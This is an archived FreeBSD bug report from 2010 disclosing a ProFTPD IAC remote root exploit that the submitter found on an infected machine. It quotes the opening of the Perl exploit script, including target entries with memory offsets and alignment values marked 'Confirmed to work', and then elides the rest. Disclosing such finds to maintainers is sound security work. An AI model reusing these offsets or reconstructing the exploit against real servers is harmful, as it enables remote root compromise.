Date: Wed, 10 Nov 2010 09:18:51 GMT From: Michel van Gruijthuijsen <mistige@gmail.com> To: freebsd-gnats-submit@FreeBSD.org Subject: misc/152100: found an exploit on freebsd, "known to work" , in an infected (linux) machine Message-ID: <201011100918.oAA9IpY0006640@www.freebsd.org> Resent-Message-ID: <201011100920.oAA9K8xh029493@freefall.freebsd.org>
next in thread | raw e-mail | index | archive | help
>Number: 152100
>Category: misc
>Synopsis: found an exploit on freebsd, "known to work" , in an infected (linux) machine
>Confidential: no
>Severity: critical
>Priority: high
>Responsible: freebsd-bugs
>State: open
>Quarter:
>Keywords:
>Date-Required:
>Class: sw-bug
>Submitter-Id: current-users
>Arrival-Date: Wed Nov 10 09:20:08 UTC 2010
>Closed-Date:
>Last-Modified:
>Originator: Michel van Gruijthuijsen
>Release: 8.x is at least one of the targeted.
>Organization:
-
>Environment:
>Description:
#!/usr/bin/perl
# Exploit Title: ProFTPD IAC Remote Root Exploit
# Date: 7 November 2010
# Author: Kingcope
use IO::Socket;
$numtargets = 13;
@targets =
(
# Plain Stack Smashing
#Confirmed to work
["FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)",# PLATFORM SPEC
"FreeBSD", # OPERATING SYSTEM
0, # EXPLOIT STYLE
0xbfbfe000, # OFFSET START
0xbfbfff00, # OFFSET END
1029], # ALIGN
#Confirmed to work
["FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)",
"FreeBSD",
0,
0xbfbfe000,
0xbfbfff00,
1021],
# Return into Libc
#Confirmed to work
["Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)",
"Linux",
1, # EXPLOIT STYLE
0x0804CCD4, # write(2) offset
8189, # ALIGN
0], # PADDING
[.....], I can send you the whole thing if you want.
>How-To-Repeat:
It's an exploit.
>Fix:
>Release-Note:
>Audit-Trail:
>Unformatted:
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?201011100918.oAA9IpY0006640>